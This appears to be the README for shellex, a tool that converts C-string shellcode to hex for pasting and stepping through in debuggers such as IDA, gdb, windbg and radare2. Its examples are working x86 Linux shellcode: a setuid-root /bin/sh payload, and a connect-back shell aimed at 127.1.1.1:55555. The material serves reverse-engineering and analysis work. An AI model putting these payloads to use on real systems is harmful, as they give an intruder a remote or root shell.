shellex
WARNING: the ugliest code in the world
C-shellcode to hex converter.
Please, consider make a donation: https://github.com/sponsors/therealdreg
Handy tool for paste & execute shellcodes in IDA PRO, gdb, windbg, radare2, ollydbg, x64dbg, immunity debugger & 010 editor.
Are you having problems converting C-shellcodes to HEX (maybe c-comments+ASCII mixed?)
Here is shellex. If the shellcode can be compiled in a C compiler shellex can convert it.
Just execute shellex, paste the shellcode c-string and press ENTER.
To end use Control+Z(Windows)/Control+D(Linux)
Converting c-shellcode-multi-line-hex+mixed_ascii (pay attention in the mixed part \x68//sh\x68/bin\x89):
"\x6a\x17\x58\x31\xdb\xcd\x80"
"\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80"
shellex output:
6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80
Converting c-shellcode-multi-line-with-comments:
"\x68"
"\x7f\x01\x01\x01" // <- IP: 127.1.1.1
"\x5e\x66\x68"
"\xd9\x03" // <- Port: 55555
"\x5f\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02"
"\x89\xe1\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79"
"\xf9\xb0\x66\x56\x66\x57\x66\x6a\x02\x89\xe1\x6a"
"\x10\x51\x53\x89\xe1\xcd\x80\xb0\x0b\x52\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
"\xeb\xce"
shellex output:
68 7F 01 01 01 5E 66 68 D9 03 5F 6A 66 58 99 6A 01 5B 52 53 6A 02 89 E1 CD 80 93 59 B0 3F CD 80 49 79 F9 B0 66 56 66 57 66 6A 02 89 E1 6A 10 51 53 89 E1 CD 80 B0 0B 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 EB CE
Do you need the shellex output as a new c-shellcode-string? just use -h parameter, example converting the shellex output:
./shellex -h 6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80
\x6A\x17\x58\x31\xDB\xCD\x80\x6A\x0B\x58\x99\x52\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x52\x53\x89\xE1\xCD\x80
Installation
git clone https://github.com/therealdreg/shellex.git
For Windows:
binary:
shellex\bins\shellex.exe
For Linux
Deps:
sudo apt-get install tcc
binary:
shellex/linuxbins/shellex
Paste & Execute shellcode in ollydbg, x64dbg, immunity debugger
Just use my xshellex plugin:
https://github.com/therealdreg/xshellex
Paste & Execute shellcode in IDA PRO with IDAPYTHON
- execute shellex
- enter the shellcode:
"\x6a\x17\x58\x31\xdb\xcd\x80"
"\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80"
- press enter
- press Control+D
- convert the shellex output to C-Hex-String with shellex -h:
shellex -h 6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80
- make your own IDAPYTHON Script:
def writebytes(dest, str):
for i, c in enumerate(str):
idc.patch_byte(dest+i, ord(c));
address = idc.get_reg_value("eip")
shellcode = "\x6A\x17\x58\x31\xDB\xCD\x80\x6A\x0B\x58\x99\x52\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x52\x53\x89\xE1\xCD\x80"
writebytes(address, shellcode)
print("done!")
- Copy the C-Hex-String to shellcode variable.
- For 32 bits use: address = idc.get_reg_value("eip")
- For 64 bits use: address = idc.get_reg_value("rip")
Debug a program in IDA PRO:
- Go to File -> Script command...
- in Script Language select: Python
- Paste the IDAPYTHON Script
- Click Run
Now you can debug the shellcode with F7, but maybe the Disasm Window shows the shellcode as db's.
Here the solution:
- Select the shellcode bytes in the disasm window
- Right click -> Undefine
- Select again the shellcode bytes in the disasm window
- Right click -> Code -> Force -> Yes
Done! You can view the shellcode disassembled and debug it with F7.
Paste & Execute shellcode in gdb
- execute shellex
- enter the shellcode:
"\x6a\x17\x58\x31\xdb\xcd\x80"
"\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80"
- press enter
- press Control+D
- convert the shellex output to C-Hex-String with shellex -h:
shellex -h 6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80
- write the C-Hex-String to a file as raw binary data with "echo":
echo -ne "\x6A\x17\x58\x31\xDB\xCD\x80\x6A\x0B\x58\x99\x52\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x52\x53\x89\xE1\xCD\x80" > /tmp/sc
- gdb /bin/ls
- starti
Write the binary file to the current instruction pointer:
for 32 bits:
restore /tmp/sc binary $eip
x/30b $eip
x/15i $eip
for 64 bits:
restore /tmp/sc binary $rip
x/30b $rip
x/15i $rip
x/30b is the size in bytes of the shellcode, you can get the size with:
wc -c /tmp/sc
x/15i is the number of instructions to display, you can get the correct number (maybe) with ndisasm:
sudo apt-get install nasm
For 32 bits:
ndisasm -b32 /tmp/sc
ndisasm -b32 /tmp/sc | wc -l
For 64 bits:
ndisasm -b64 /tmp/sc
ndisasm -b64 /tmp/sc | wc -l
Paste & Execute shellcode in gdb-gef
- execute shellex
- enter the shellcode:
"\x6a\x17\x58\x31\xdb\xcd\x80"
"\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80"
- press enter
- press Control+D
- convert with: echo "SPACE shellex_output" | sed "s/ / 0x/g"
echo " 6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80" | sed "s/ / 0x/g"
Use patch byte command:
For 32 bits:
patch byte $eip 0x6A 0x17 0x58 0x31 0xDB 0xCD 0x80 0x6A 0x0B 0x58 0x99 0x52 0x68 0x2F 0x2F 0x73 0x68 0x68 0x2F 0x62 0x69 0x6E 0x89 0xE3 0x52 0x53 0x89 0xE1 0xCD 0x80
For 64 bits:
patch byte $rip 0x6A 0x17 0x58 0x31 0xDB 0xCD 0x80 0x6A 0x0B 0x58 0x99 0x52 0x68 0x2F 0x2F 0x73 0x68 0x68 0x2F 0x62 0x69 0x6E 0x89 0xE3 0x52 0x53 0x89 0xE1 0xCD 0x80
Execute context command and check if the disasm is correct
Paste & Execute shellcode in gdb-peda
- execute shellex
- enter the shellcode:
"\x6a\x17\x58\x31\xdb\xcd\x80"
"\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80"
- press enter
- press Control+D
- convert the shellex output to C-Hex-String with shellex -h:
shellex -h 6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80
For 32 bits:
patch $eip "\x6A\x17\x58\x31\xDB\xCD\x80\x6A\x0B\x58\x99\x52\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x52\x53\x89\xE1\xCD\x80"
For 64 bits:
patch $rip "\x6A\x17\x58\x31\xDB\xCD\x80\x6A\x0B\x58\x99\x52\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x52\x53\x89\xE1\xCD\x80"
Execute context command and check if the disasm is correct
Paste & Execute shellcode in windbg
- execute shellex
- enter the shellcode:
"\x6a\x17\x58\x31\xdb\xcd\x80"
"\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80"
- press enter
- press Control+D
via eb
For small shellcodes eb can be fine, just use shellex output with eb command (thx Axel Souchet @0vercl0k for the hint)
For 32 bits:
eb @eip 6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80
For 64 bits:
eb @rip 6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80
via file
- convert the shellex output to raw binary data with certutil:
echo 6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80 > C:\Users\Dreg\sc.hex
certutil -f -decodeHex c:\Users\Dreg\sc.hex c:\Users\Dreg\sc
del C:\Users\Dreg\sc.hex
certutil output:
Input Length = 92
Output Length = 30
CertUtil: -decodehex command completed successfully.
The lenght of our shellcode is 30, then use L0n30 in windbg.
Write the binary file to the current instruction pointer:
for 32 bits:
.readmem C:\Users\Dreg\sc @eip L0n30
for 64 bits:
.readmem C:\Users\Dreg\sc @rip L0n30
Paste & Execute shellcode in radare2
- execute shellex
- enter the shellcode:
"\x6a\x17\x58\x31\xdb\xcd\x80"
"\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80"
- press enter
- press Control+D
- convert the shellex output to C-Hex-String with shellex -h:
shellex -h 6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80
- write the C-Hex-String in radare2 using the "w" command:
For 32 bits:
w \x6A\x17\x58\x31\xDB\xCD\x80\x6A\x0B\x58\x99\x52\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x52\x53\x89\xE1\xCD\x80 @eip
For 64 bits:
w \x6A\x17\x58\x31\xDB\xCD\x80\x6A\x0B\x58\x99\x52\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x52\x53\x89\xE1\xCD\x80 @rip
Check if the shellcode is well-pasted:
Get the size of the shellcode in a terminal with:
echo -ne "\x6A\x17\x58\x31\xDB\xCD\x80\x6A\x0B\x58\x99\x52\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x52\x53\x89\xE1\xCD\x80" | wc -c
The output of last command is 30, Now use pD command in radare2:
pD 30
Non interactive mode
Converting "\x6a\x17\x58\x31\xdb\xcd\x80" in Linux:
echo "\"\\x6a\\x17\\x58\\x31\\xdb\\xcd\\x80\"" | shellex
Converting "\x6a\x17\x58\x31\xdb\xcd\x80" in Windows:
echo "\x6a\x17\x58\x31\xdb\xcd\x80" | shellex.exe
Via multi-line-file in Windows:
C:\Users\Dreg\Desktop\shellex\bins>type sc.txt
"\x6a\x17\x58\x31\xdb\xcd\x80"
"\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80"
C:\Users\Dreg\Desktop\shellex\bins>type sc.txt | shellex.exe
Via multi-line-file in Linux:
dreg@fr33project# cat sc.txt
"\x6a\x17\x58\x31\xdb\xcd\x80"
"\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80"
dreg@fr33project# cat sc.txt | shellex
Compilation
For Windows just use Visual Studio 2013
- https://my.visualstudio.com/Downloads?q=visual%20studio%202013&wt.mc_id=o~msft~vscom~older-downloads
- https://go.microsoft.com/fwlink/?LinkId=532495&clcid=0x409
For Linux just:
cd shellex/shellex
gcc -o shellex shellex.c
./shellex